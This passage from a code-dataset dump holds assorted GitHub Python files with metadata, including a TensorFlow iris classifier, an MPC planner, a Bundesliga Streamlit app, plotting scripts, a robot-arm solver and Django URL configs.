self.reqDateTime,)\n\t\tinject.save()","repo_name":"eugenetdr/50.003-Capstone-Allocation","sub_path":"capstoneAllocation/requirements/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18497821722","text":"import tensorflow as tf\nimport pandas as pd\n\nCSV_COLUMN_NAMES = ['SepalLength', 'SepalWidth',\n 'PetalLength', 'PetalWidth', 'Species']\n\ndef load_data(label_name='Species'):\n #导入数据\n train_path = \"D:\\project\\Python\\Tensorflow\\get_start\\iris_training.csv\"\n test_path=\"D:\\project\\Python\\Tensorflow\\get_start\\iris_test.csv\"\n # train_path now holds the pathname: ~/.keras/datasets/iris_training.csv\n\n # Parse the local CSV file.\n train = pd.read_csv(filepath_or_buffer=train_path,\n names=CSV_COLUMN_NAMES, # list of column names\n header=0 # ignore the first row of the CSV file.\n )\n # train now holds a pandas DataFrame, which is data structure\n # analogous to a table.\n\n # 1. Assign the DataFrame's labels (the right-most column) to train_label.\n # 2. Delete (pop) the labels from the DataFrame.\n # 3. 
Assign the remainder of the DataFrame to train_features\n train_features, train_label = train, train.pop(label_name)\n\n # Apply the preceding logic to the test set.\n test = pd.read_csv(test_path, names=CSV_COLUMN_NAMES, header=0)\n test_features, test_label = test, test.pop(label_name)\n\n # Return four DataFrames.\n return (train_features, train_label), (test_features, test_label)\n\ndef describe_data(train_x):\n my_feature_columns=[]\n for key in train_x.keys():\n my_feature_columns.append(tf.feature_column.numeric_column(key=key))\n return my_feature_columns\n\ndef train_input_fn(features,labels,batch_size):\n dataset=tf.data.Dataset.from_tensor_slices((dict(features),labels))\n dataset=dataset.shuffle(buffer_size=1000).repeat(count=None).batch(batch_size)\n return dataset.make_one_shot_iterator().get_next()\n\n\ndef input_fn(features,labels=None,batch_size=None):\n if labels is None:\n inputs=features\n else:\n inputs=(features,labels)\n \n dataset=tf.data.Dataset.from_tensor_slices(inputs)\n\n assert batch_size is not None\n dataset=dataset.batch(batch_size)\n\n return dataset.make_one_shot_iterator().get_next()\n\n\n \n\n\n\n\n\n\n\n(train_x,train_y),(test_x,test_y)=load_data()\n\nmy_feature_columns=describe_data(train_x)\n\nclassifier=tf.estimator.DNNClassifier(feature_columns=my_feature_columns,hidden_units=[10,10],n_classes=3)\n\n# train() expects a callable input_fn; the original passed the dataset directly\n# and referenced an undefined `args` - the batch size and step count below are\n# assumed placeholder values.\nclassifier.train(input_fn=lambda: train_input_fn(train_x,train_y,100),steps=1000)\n","repo_name":"gdjinjiahao/project","sub_path":"Python/Tensorflow/get_start/premade_estimator.py","file_name":"premade_estimator.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9731192425","text":"from functools import partial\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport scipy.stats as stats\n\n\n# -----------------------------------------------------------------------------------\n# Agent\n# -----------------------------------------------------------------------------------\n\nclass MPCAgent:\n \"\"\"Encapsulates sampling-based MPC.\"\"\"\n\n def __init__(self,\n obs_space,\n act_space,\n env_cost_func,\n model,\n act_opt_freq=1,\n horizon=25,\n cem_args={},\n **kwargs):\n # params\n self.obs_space = obs_space\n self.act_space = act_space\n # NOTE: should match the reward/cost func from `env.step(...)`\n self.env_cost_func = env_cost_func\n\n # NOTE: determines how often the action sequence will be optimized\n # NOTE: reoptimizes at every call to `act(...)`\n self.act_opt_freq = act_opt_freq\n self.horizon = horizon\n\n # model\n self.model = model\n self.device = \"cpu\"\n\n # planner\n self.dO = obs_space.shape[0]\n self.dU = act_space.shape[0]\n self.ac_ub = act_space.high\n self.ac_lb = act_space.low\n\n # optimizer (planner)\n self.planner_opt = CEMOptimizer(\n self.horizon * self.dU,\n lower_bound=np.tile(self.ac_lb, [self.horizon]),\n upper_bound=np.tile(self.ac_ub, [self.horizon]),\n **cem_args)\n\n def to(self, device):\n \"\"\"Puts agent to device.\"\"\"\n self.model.to(device)\n self.device = device\n\n def train(self):\n \"\"\"Sets training mode.\"\"\"\n self.model.train()\n\n def eval(self):\n \"\"\"Sets evaluation mode.\"\"\"\n self.model.eval()\n\n def state_dict(self):\n \"\"\"Snapshots agent state.\"\"\"\n return {\n \"model\": self.model.state_dict(),\n }\n\n def load_state_dict(self, state_dict):\n \"\"\"Restores agent state.\"\"\"\n 
self.model.load_state_dict(state_dict[\"model\"])\n\n def reset(self):\n \"\"\"Resets this controller (at trajectory start).\"\"\"\n self.ac_buf = np.array([]).reshape(0, self.dU)\n self.prev_sol = np.tile((self.ac_lb + self.ac_ub) / 2, [self.horizon])\n self.init_var = np.tile(\n np.square(self.ac_ub - self.ac_lb) / 16, [self.horizon])\n self.planner_opt.reset()\n\n def act(self, obs, t, info):\n \"\"\"Selects action based on learned dynamics and mpc planning.\n\n Constructs the cost function for the current step, which is \n different between steps due to different current obs, and \n passes other necessary arguments `info` for `env_cost_func`.\n \"\"\"\n cost_func = partial(self.cost_func, obs=obs, info=info)\n action = self._solve_mpc(cost_func)\n return action\n\n def _solve_mpc(self, cost_func):\n \"\"\"Solves the MPC optimization problem for action sequence.\"\"\"\n if self.ac_buf.shape[0] > 0:\n action, self.ac_buf = self.ac_buf[0], self.ac_buf[1:]\n return action\n\n soln = self.planner_opt.obtain_solution(self.prev_sol, self.init_var,\n cost_func)\n # for next call of `act(...)`\n # previous soln is everything after currently taken action\n self.prev_sol = np.concatenate([\n np.copy(soln)[self.act_opt_freq * self.dU:],\n np.zeros(self.act_opt_freq * self.dU)\n ])\n # current soln, can take 1st step as action\n # saves `act_opt_freq` steps to reduce solving mpc every step\n self.ac_buf = soln[:self.act_opt_freq * self.dU].reshape(-1, self.dU)\n\n return self._solve_mpc(cost_func)\n\n @torch.no_grad()\n def cost_func(self, ac_seqs, obs=None, info=None):\n \"\"\"MPC rollout cost.\n \n Args:\n ac_seqs (np.array): decision vars, (pop_size, horizon * act_dim) actions.\n obs (np.array): conditional vars, (O,) current observation.\n info (dict): conditional vars, current info from env.\n\n Returns:\n np.array: (pop_size,) costs\n \"\"\"\n pop_size = ac_seqs.shape[0]\n # For parallel compute, (H, Pop_size, A)\n ac_seqs = torch.from_numpy(ac_seqs).float()\n ac_seqs = ac_seqs.view(-1, self.horizon, self.dU).transpose(0, 1)\n\n # current observation, (Pop_size, O)\n cur_obs = torch.from_numpy(obs).float()\n cur_obs = cur_obs.unsqueeze(0).repeat((pop_size, 1))\n\n costs = torch.zeros(pop_size)\n for t in range(self.horizon):\n cur_acs = ac_seqs[t]\n # maybe model forward in GPU but mpc planning in CPU\n next_obs = self.model(cur_obs.to(self.device),\n cur_acs.to(self.device))\n next_obs = next_obs.cpu()\n cur_obs = next_obs\n # shape (*,)\n cost = self.env_cost_func(next_obs, cur_acs, info)\n costs += cost\n\n # replace nan with high cost\n costs[costs != costs] = 1e6\n # (Pop_size,)\n return costs.detach().cpu().numpy()\n\n\n# -----------------------------------------------------------------------------------\n# Sampling-based Optimizer\n# -----------------------------------------------------------------------------------\n\nclass CEMOptimizer:\n \"\"\"Cross-entropy method for (gradient-free) optimization.\"\"\"\n\n def __init__(self, sol_dim, lower_bound=None, upper_bound=None, max_iters=5, pop_size=400, num_elites=40, epsilon=0.001, alpha=0.25):\n \"\"\"Creates the CEM optimizer.\n\n Args:\n sol_dim (int): The dimensionality of the problem space\n lower_bound (np.array): An array of lower bounds\n upper_bound (np.array): An array of upper bounds\n max_iters (int): The maximum number of iterations to perform during optimization\n pop_size (int): The number of candidate solutions to be sampled at every iteration\n num_elites (int): The number of top solutions that will be used to obtain the 
distribution\n at the next iteration.\n epsilon (float): A minimum variance. If the maximum variance drops below epsilon, optimization is\n stopped.\n alpha (float): Controls how much of the previous mean and variance is used for the next iteration.\n next_mean = alpha * old_mean + (1 - alpha) * elite_mean, and similarly for variance.\n \"\"\"\n self.sol_dim = sol_dim\n self.max_iters = max_iters\n self.pop_size = pop_size\n self.num_elites = num_elites\n\n self.lb = lower_bound\n self.ub = upper_bound\n self.epsilon = epsilon\n self.alpha = alpha\n\n if num_elites > pop_size:\n raise ValueError(\"Number of elites must be at most the population size.\")\n\n def reset(self):\n pass\n\n def obtain_solution(self, init_mean, init_var, cost_func):\n \"\"\"Optimizes the cost function using the provided initial candidate distribution\n\n Args:\n init_mean (np.ndarray): The mean of the initial candidate distribution.\n init_var (np.ndarray): The variance of the initial candidate distribution.\n cost_func (callable): cost function with only the unsolved variable as arguments.\n \"\"\"\n mean, var, t = init_mean, init_var, 0\n X = stats.truncnorm(-2, 2, loc=np.zeros_like(mean), scale=np.ones_like(var))\n\n while (t < self.max_iters) and np.max(var) > self.epsilon:\n lb_dist, ub_dist = mean - self.lb, self.ub - mean\n constrained_var = np.minimum(np.minimum(np.square(lb_dist / 2), np.square(ub_dist / 2)), var)\n\n samples = X.rvs(size=[self.pop_size, self.sol_dim]) * np.sqrt(constrained_var) + mean\n samples = samples.astype(np.float32)\n costs = cost_func(samples)\n\n elites = samples[np.argsort(costs)][:self.num_elites]\n\n new_mean = np.mean(elites, axis=0)\n new_var = np.var(elites, axis=0)\n\n mean = self.alpha * mean + (1 - self.alpha) * new_mean\n var = self.alpha * var + (1 - self.alpha) * new_var\n\n t += 1\n return mean\n \n \n","repo_name":"StafaH/safe_imitation","sub_path":"safe_il/agents/mpc/mpc_utils.py","file_name":"mpc_utils.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26855522460","text":"import logging\n\nclass BrokerageServer():\n\n def __init__(self, consumer, producer, order_repository, logger=None):\n self._consumer = consumer\n self._producer = producer\n self._order_repository = order_repository\n self._logger = logger or logging.getLogger(__name__)\n self._producer.req_cancel_order(self._consumer.cancel_order)\n self._producer.req_place_order(self._place_order_wrapper)\n self._producer.req_modify_order(self._consumer.modify_order)\n self._producer.req_get_position(self._consumer.get_position)\n self._producer.req_get_order_status(self._consumer.get_order_status)\n self._producer.req_get_orders(self._consumer.get_orders)\n #self._consumer.on_position_update(self._producer.publish_position_update)\n #self._consumer.on_order_update(self._producer.publish_order_update)\n #self._consumer.on_new_order(self._producer.publish_new_order)\n\n def connect(self):\n self._consumer.connect()\n self._producer.connect()\n\n def run(self):\n self._consumer.run()\n self._producer.run()\n\n async def _place_order_wrapper(self, order_request):\n self._logger.info(\"[ORQ] Pushing order request\")\n _order_request = order_request.copy()\n try:\n self._order_repository.add_order_request(_order_request)\n except Exception as e:\n self._logger.error('Failed to add order request to repository: {}'.format(e))\n order_id = await self._consumer.place_order(order_request)\n if 
isinstance(order_id,int):\n _order_request['orderId'] = order_id\n try:\n self._order_repository.add_order_execution(_order_request)\n except Exception as e:\n self._logger.error('Failed to add order execution to repository: {}'.format(e))\n\n","repo_name":"ardagk/trisigma","sub_path":"trisigma/app/brokerage/interactor/brokerage_server.py","file_name":"brokerage_server.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1762043142","text":"#!/usr/bin/env python3\n\nimport sys\nfrom collections import defaultdict\n\n\nmins = defaultdict(lambda: 99.9)\nmaxs = defaultdict(lambda: -99.9)\nlast_k = None\nk = None\n\nfor line in sys.stdin:\n if not line.strip():\n continue\n k, v, w = line.strip().split('\\t')\n v = float(v)\n w = float(w)\n\n mins[k] = min(mins[k], v)\n maxs[k] = max(maxs[k], w)\n\n if last_k != k:\n if last_k:\n print('%s\\t%s\\t%s' % (last_k, mins[last_k], maxs[last_k]))\n last_k = k\n\nif last_k == k:\n print('%s\\t%s\\t%s' % (k, mins[last_k], maxs[last_k]))\n","repo_name":"aFlyWeight/ParallelProgrammingHomework","sub_path":"最后大作业/project3/codeanddata/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12127958214","text":"import numpy as np\nfrom scipy.optimize import minimize\nfrom ns_func import Z\n\n# Defining optimizators\ndef iter_minimizer(Loss, beta_init, loss_args, bounds, max_deal_span, **kwargs):\n i = 0.1\n def callback_print(xk):\n loss = Loss(xk, df=loss_args[0], coupons_cf=loss_args[1], \n streak_data=loss_args[2], weight_scheme=loss_args[4])\n print(xk, loss)\n #optimization goes in loop until spot rate function will not be bigger\n #than 0 at each point;\n #Z constructs from 0.001 year to 30 year (no bonds with tenor > 30 year)\n while (Z(np.linspace(0.001, 30, 1000), beta_init)).min() < 0 or i == 0.1:\n res = minimize(fun=Loss, x0=beta_init, args=loss_args, bounds=bounds, \n callback=callback_print, **kwargs) \n beta_init = res.x\n #bounds of teta increases at every iteration by i which itself increases\n #also, as we want to exit negative zone as fast as we can\n bounds = ((0, 1), (None, None), (None, None), \n (beta_init[-1] + i, 0.05 * max_deal_span))\n i += 0.1\n return res\n\n","repo_name":"DFSResearch/FinancialStability_Lab","sub_path":"NelsonSiegel/optimizator/simultaneous_min.py","file_name":"simultaneous_min.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"11249530645","text":"from typing import List\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n \n if not nums: \n return 0\n \n index = 0\n compare = nums[0]\n\n for num in nums: \n if num > compare: \n index += 1\n nums[index] = num\n compare = nums[index]\n \n return index + 1\n\ndef main():\n sol = Solution()\n\n list1 = [1,1,2]\n list2 = [0,0,1,1,1,2,2,3,3,4]\n list3 = [1]\n list4 = []\n list5 = [0,0,0,0,0,0,0,0,2]\n\n print(sol.removeDuplicates(list2))\n print(list2)\n\nif __name__ == \"__main__\":\n main()","repo_name":"kgremban/leetcode","sub_path":"0026-remove-duplicates-fror-sorted-array.py","file_name":"0026-remove-duplicates-fror-sorted-array.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"32160006165","text":"import streamlit as st\nfrom streamlit_option_menu import option_menu\nfrom python_scripts.data_script import BunesligaInfo, BundesligaGameData\nfrom python_scripts.game_stats_app_scripts.game_stats_utils import GameStatsConfiguration, GameStatsProcessing\nfrom python_scripts.game_stats_app_scripts.game_results_script import game_results_page\nfrom python_scripts.game_stats_app_scripts.standings_stats_script import standings_page\nfrom python_scripts.game_stats_app_scripts.game_stats_script import game_stats_page\nfrom python_scripts.game_stats_app_scripts.team_stats_script import team_page\nfrom python_scripts.game_stats_app_scripts.player_stats_script import player_page\nfrom python_scripts.game_stats_app_scripts.gk_stats_script import gk_page\n\ndef game_stats_analysis(bundesliga_info:BunesligaInfo,\n bundesliga_game_data:BundesligaGameData,\n game_stats_config:GameStatsConfiguration,\n game_stats_processing:GameStatsProcessing,\n team:str, \n season_teams:list,\n season:str, \n last_5_seasons:list) -> st:\n\n\n # ##### Load Season Data\n table_info = game_stats_config.get_tab_info()\n season_team_data = bundesliga_game_data.retrieve_season_data(table=table_info.team_stats_tab, \n season=season)\n season_gk_data = bundesliga_game_data.retrieve_season_data(table=table_info.gk_stats_tab,\n season=season)\n\n season_data = game_stats_processing.filter_season_data(\n data=game_stats_processing.process_goals_opponent(\n data=game_stats_processing.process_team_data(data=season_team_data, \n data_gk=season_gk_data)))\n \n # ##### Page Description\n st.markdown(\n 'Analyse different types of Bundesliga Game Stats at both '\n 'Team and Player level',\n unsafe_allow_html=True)\n\n # ##### Game Stats Analysis Types\n statistics_type = [\"Match Day Results\",\n \"Season Standings\",\n \"Game Statistics\",\n \"Team Statistics\",\n \"Player Statistics\",\n \"Gk Statistics\"]\n\n with st.sidebar:\n st.subheader(\"Statistics\")\n statistics_track = option_menu(menu_title=None,\n options=statistics_type,\n icons=[\"calendar3\", \"table\", \"clipboard-data\",\n \"reception-4\", \"person-lines-fill\", \"shield-shaded\"],\n styles={\"nav-link\": {\"--hover-color\": \"#e5e5e6\"}})\n\n ##### Match Day Results\n if statistics_track == 'Match Day Results':\n game_results_page(game_stats_config=game_stats_config,\n data=season_data,\n page_season=season, \n favourite_team=team)\n\n # ##### Season Table\n elif statistics_track == 'Season Standings':\n standings_page(game_stats_config=game_stats_config,\n game_stats_processing=game_stats_processing,\n data=season_data, \n page_season=season,\n favourite_team=team)\n \n # ##### Game Statistics\n elif statistics_track == 'Game Statistics':\n game_stats_page(data=season_data,\n page_season=season,\n favourite_team=team)\n\n ##### Team Statistics\n elif statistics_track == 'Team Statistics':\n # ##### Load Last 5 Seasons Data\n all_seasons_team_data = bundesliga_game_data.retrieve_all_seasons_data(table=table_info.team_stats_tab,\n team=team,\n seasons=last_5_seasons,\n team_analysis=True)\n all_seasons_gk_data = bundesliga_game_data.retrieve_all_seasons_data(table=table_info.gk_stats_tab,\n team=team,\n seasons=last_5_seasons)\n \n # ##### Process Last 5 Seasons Data\n all_seasons_data = game_stats_processing.filter_season_data(\n data=game_stats_processing.process_team_data(data=all_seasons_team_data,\n data_gk=all_seasons_gk_data))\n \n # ##### Retrieve Season Games\n 
season_games_schedule=bundesliga_info.retrieve_season_games(table=table_info.games_tab,\n season=season)\n\n # ##### Team Page\n team_page(data=season_data,\n data_all=all_seasons_data,\n games_schedule=season_games_schedule,\n page_season=season,\n favourite_team=team,\n season_teams=season_teams)\n \n # # ##### Player Statistics\n elif statistics_track == 'Player Statistics':\n season_player_data = game_stats_processing.filter_season_data(data=bundesliga_game_data.retrieve_season_data(\n table=table_info.player_stats_tab, season=season))\n \n player_page(data=season_player_data,\n favourite_team=team,\n page_season=season,\n season_teams=season_teams,\n last_5_seasons=last_5_seasons)\n \n # ##### Goalkeeper Statistics\n elif statistics_track == 'Gk Statistics':\n season_gk_data = game_stats_processing.filter_season_data(data=season_gk_data)\n\n gk_page(data=season_gk_data,\n favourite_team=team,\n page_season=season,\n season_teams=season_teams,\n last_5_seasons=last_5_seasons)\n \n st.sidebar.markdown(\"\")\n","repo_name":"BVBtm86/bundesliga_app","sub_path":"python_scripts/game_stats_app.py","file_name":"game_stats_app.py","file_ext":"py","file_size_in_byte":6280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"19844949372","text":"import csv\nimport matplotlib.pyplot as plt\n\ndef read_data():\n with open(\"Visual/subplots2/temps.csv\") as csvfile:\n # Use the csv.reader function to get data from the csv file, \n # then use the next function to take the headers from the\n # file\n csv_reader = csv.reader(csvfile)\n headers = next(csv_reader)\n\n # Using an empty dict, use a loop to append the headers as\n # keys, each key will store a list\n data = {}\n for header in headers:\n data[header]=[]\n\n # Then, for every other line in the file, repeated by the number\n # of headers, we append the data to their appropriate header\n for line in csv_reader:\n for count in range(len(headers)):\n data[headers[count]].append(line[count] + \"°\")\n\n # Return the dict\n return data\n\n# Run function which takes no parameters\ndef run():\n # Firstly, call the read_data function and store its contents\n # in a variable, I use a second variable to get the items in\n # the dict\n data = read_data()\n formatted_data = data.items()\n\n # Next, using a loop, we find out how many subplots will be needed\n subplots_needed = 0\n for count in range(len(formatted_data)):\n subplots_needed += 1\n \n # Using the variable above, we can dynamically add more subplots\n # if additional data is added to the temps.csv file\n fig, axes = plt.subplots(subplots_needed, 1, sharex=\"all\", sharey=\"all\")\n fig.suptitle(\"Dynamic Temperature Data\")\n\n # We can do the same for plotting data, a count variable is used\n # to decide which subplot should be plotted to\n count = 0\n for line in formatted_data:\n axes[count].plot(range(1, 8), line[1], \"bo-\")\n count += 1\n\n # Finally, I set an x label, make the figure use a tight layout\n # and show the plot\n axes[-1].set_xlabel(\"Day\")\n\n fig.tight_layout()\n plt.show()\n\n# Run the program\nrun()","repo_name":"WT000/COM411","sub_path":"Visual/subplots2/csv_data.py","file_name":"csv_data.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29675414485","text":"import os\nimport matplotlib.pyplot as plt\n\nfrom misomip1analysis.models import load_datasets\nfrom misomip1analysis.util import 
string_to_list\n\n\ndef plot_metric_timeseries(config):\n \"\"\"\n Plot a time series of a given metric for all models.\n\n Parameters\n ----------\n config : ConfigParser\n config options\n \"\"\"\n\n experiment = config['experiment']['name']\n\n metrics = config['metrics']\n metricNames = string_to_list(metrics['names'])\n if metricNames[0] == '':\n # nothing to plot\n return\n\n plotFolder = metrics['folder']\n\n try:\n os.makedirs(plotFolder)\n except OSError:\n pass\n\n colors = string_to_list(metrics['colors'])\n dpi = metrics.getint('dpi')\n lineWidth = metrics.getint('lineWidth')\n figsize = string_to_list(metrics['figsize'])\n figsize = [float(dim) for dim in figsize]\n\n datasets, maxTime = load_datasets(config, variableList=metricNames)\n modelNames = list(datasets.keys())\n\n for metricName in metricNames:\n metricConfig = config[metricName]\n semilog = metricConfig.getboolean('semilog')\n scale = metricConfig.getfloat('scale')\n title = metricConfig['title']\n\n plt.figure(figsize=figsize)\n for modelIndex, modelName in enumerate(modelNames):\n ds = datasets[modelName]\n if metricName not in ds.data_vars:\n continue\n\n years = ds.time.values/config['constants'].getfloat('sPerYr')\n field = scale*ds[metricName].values\n if semilog:\n plt.semilogy(years, field, label=modelName,\n color=colors[modelIndex], linewidth=lineWidth)\n else:\n plt.plot(years, field, label=modelName,\n color=colors[modelIndex], linewidth=lineWidth)\n\n plt.ylabel(title)\n plt.xlabel('time (a)')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.draw()\n plt.savefig('{}/{}_{}.png'.format(plotFolder, experiment, metricName),\n dpi=dpi)\n plt.close()\n","repo_name":"xylar/misomip1analysis","sub_path":"misomip1analysis/plot/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"21246046769","text":"import numpy as np\n\nfrom math import cos, sin, pi\nimport os\nimport matplotlib.pyplot as plt\nfrom PIL import Image, ImageDraw\n\"\"\"\n input [A, B, C, X, Y]\n output [theta, omega, phi]/180\n X <- A cos(theta) + B cos(theta + omega -90) + C cos(theta + omega + phi - 180)\n Y <- A sin(theta) + B sin(theta + omega -90) + C sin(theta + omega + phi - 180)\n\"\"\"\n\nclass solver():\n \n def func(self, theta, omega, phi, A=125.0, B=125.0, C=195.0):\n x = y = 0\n ang = theta\n angr = ang / 180 * pi\n x += A * cos(angr)\n y += A * sin(angr)\n ang += omega -90\n angr = ang / 180 * pi\n x += B * cos(angr)\n y += B * sin(angr)\n ang += phi -90\n angr = ang / 180 * pi\n x += C * cos(angr)\n y += C * sin(angr)\n return x, y\n \n \n def GenData(self):\n print('GenData')\n im = Image.new(\"RGBA\", (1000, 1000), (0,0,0,0)) # x , y range\n draw = ImageDraw.Draw( im ) # painter color\n \n loss = Image.new(\"RGBA\", (1000, 1000), (0,0,0,0)) # x , y range\n drawloss = ImageDraw.Draw( loss ) # painter color\n \n def DrawColor(x, y, R, G, B):\n x, y, R, G, B = int(x), int(y), int(R), int(G), int(B)\n \n def vert_loss(theta, omega, phi):\n return abs(theta + omega + phi - 540 + (180 - 60))\n \n def desicion(axis = list, angle = list, cover = False):\n a,b,c,_ = im.getpixel((axis[0],axis[1]))\n vl = vert_loss(angle[0], angle[1], angle[2])\n if cover and vl < vert_loss(a,b,c):\n draw.point([axis[0],axis[1]],fill=(angle[0], angle[1], angle[2], 255))\n drawloss.point([axis[0],axis[1]],fill=(vl, vl, vl, 255))\n elif _ == 0 or ( _ ==250 ):\n draw.point([axis[0],axis[1]],fill=(angle[0], angle[1], 
angle[2], 250))\n drawloss.point([axis[0],axis[1]],fill=(vl, vl, vl, 255))\n \n desicion([x,y],angle=([R,G,B]), cover = True)\n desicion([x+1,y],angle=([R,G,B]))\n desicion([x-1,y],angle=([R,G,B]))\n desicion([x,y+1],angle=([R,G,B]))\n desicion([x,y-1],angle=([R,G,B]))\n desicion([x+1,y+1],angle=([R,G,B]))\n desicion([x+1,y-1],angle=([R,G,B]))\n desicion([x-1,y+1],angle=([R,G,B]))\n desicion([x-1,y-1],angle=([R,G,B]))\n \n for theta in range(15,165):\n for omega in range(90,180):\n for phi in range(90,180):\n x, y = self.func(theta, omega, phi)\n x = int(x+500)\n y = int(y+500)\n DrawColor(x, y, theta, omega, phi)\n DrawColor(500, 500, 0, 0, 0)\n DrawColor(505, 500, 255, 0, 0)\n DrawColor(500, 505, 0, 255, 0)\n \n im.save( os.path.dirname(os.path.abspath(__file__)) + \"/fileout60.png\")\n loss.save( os.path.dirname(os.path.abspath(__file__)) + \"/loss60.png\")\n \n \n def Calc(self,x_in,y_in,show = True):\n im = Image.open(os.path.dirname(os.path.abspath(__file__)) + \"/fileout.png\")\n x = x_in + 500\n y = y_in + 500\n \n t, o, p, _ = im.getpixel((x,y))\n \n if _ == 0:\n print('[solver] No Solution')\n return 0,0,0\n x, y = self.func(t,o,p)\n \n if show:\n print(f'[solver]\\n target x = {x_in}, target y = {y_in},\\n solver x = {x}, solver y = {y}\\n solution = {t},{o},{p}, error = {pow((x-x_in),2) + pow((y-y_in),2) }')\n return t, o, p\n\nif __name__ == \"__main__\":\n s = solver()\n select = input('input mode:')\n if select == '0':\n s.GenData()\n else:\n select = select.split(' ')","repo_name":"Agenicy/Gomoku-With-Robot-Arm","sub_path":"ESgomoku/Braccio/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"10660912915","text":"lines = map(str.strip, open(\"21.txt\").readlines())\r\n\r\nmonkeys = {}\r\n\r\nfor line in lines:\r\n name = line[:4]\r\n op = line[6:]\r\n if len(op) <= 6:\r\n op = int(op)\r\n monkeys[name] = op\r\n\r\n\r\ndef get(key):\r\n op = monkeys[key]\r\n if type(op) == int:\r\n return op\r\n\r\n # print(op)\r\n x = op[:4]\r\n cmd = op[5]\r\n y = op[7:]\r\n\r\n\r\n if x == \"humn\" or y == \"humn\":\r\n return False\r\n\r\n xx = get(x)\r\n yy = get(y)\r\n\r\n if key == \"root\":\r\n print(xx, yy)\r\n\r\n if type(xx) == bool and xx == False:\r\n return False\r\n if type(yy) == bool and yy == False:\r\n return False\r\n\r\n if cmd == \"+\":\r\n val = xx + yy\r\n if cmd == \"-\":\r\n val = xx - yy\r\n if cmd == \"*\":\r\n val = xx * yy\r\n if cmd == \"/\":\r\n val = xx // yy\r\n\r\n monkeys[key] = val\r\n return val\r\n\r\nfor k in monkeys:\r\n get(k)\r\n\r\nfor k, v in monkeys.items():\r\n if type(v) != int:\r\n print(k, v)\r\n\r\nmonkeys[\"humn\"] = \"HUMN\"\r\n\r\n# reverse instructions\r\n\r\ndef chain(key, val):\r\n op = monkeys[key]\r\n\r\n if type(op) == int:\r\n return op\r\n\r\n x = op[:4]\r\n cmd = op[5]\r\n y = op[7:]\r\n\r\n\r\n if key == \"root\":\r\n cmd = \"=\"\r\n\r\n xx = monkeys[x]\r\n yy = monkeys[y]\r\n\r\n \r\n if type(xx) == int:\r\n print(key, \"=\", x, cmd, y, \"AKA\", val, \"=\", xx, cmd, y)\r\n if type(yy) == int:\r\n print(key, \"=\", x, cmd, y, \"AKA\", val, \"=\", x, cmd, yy)\r\n\r\n if type(xx) != int and type(yy) != int:\r\n print(\"CRAPPPPP\")\r\n\r\n if cmd == \"=\":\r\n if type(xx) == int:\r\n return y, xx\r\n if type(yy) == int:\r\n return x, yy\r\n if cmd == \"+\":\r\n if type(xx) == int:\r\n return y, val - xx\r\n if type(yy) == int:\r\n return x, val - yy\r\n if cmd == \"-\":\r\n if type(xx) == int:\r\n 
return y, xx - val\r\n    if type(yy) == int:\r\n        return x, val + yy\r\n    if cmd == \"*\":\r\n        if type(xx) == int:\r\n            return y, val // xx\r\n        if type(yy) == int:\r\n            return x, val // yy\r\n    if cmd == \"/\":\r\n        if type(xx) == int:\r\n            return y, xx // val  # val = xx / yy, so yy = xx // val\r\n        if type(yy) == int:\r\n            return x, val * yy\r\n\r\n\r\nkey = \"root\"\r\nval = None\r\nwhile True:\r\n    key, val = chain(key, val)\r\n    print(key, val)\r\n","repo_name":"koenbot/aoc2022","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38540231552","text":"from .clothing import Clothing\nfrom seasons import ColdWeather, CoolWeather\nfrom departments import Mens, Womens, Youths, Childrens\n\n\nclass Sweater(Clothing, Mens, Womens): # Mix-in strategy for composition\n def __init__(self, name, color, price, material, sku):\n Clothing.__init__(self, name, color, price, material, sku)\n Mens.__init__(self)\n Womens.__init__(self)\n CoolWeather.__init__(self)\n ColdWeather.__init__(self)\n","repo_name":"Nathan-Chevalier/steves-styles","sub_path":"clothes/sweater.py","file_name":"sweater.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25405136473","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nimport os\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^glove/', include('JhaneGlove.urls', namespace=\"glove\")),\n url(r'^', include('JhaneGlove.urls', namespace=\"glove\")),\n url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT }),\n\n\n url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_URL 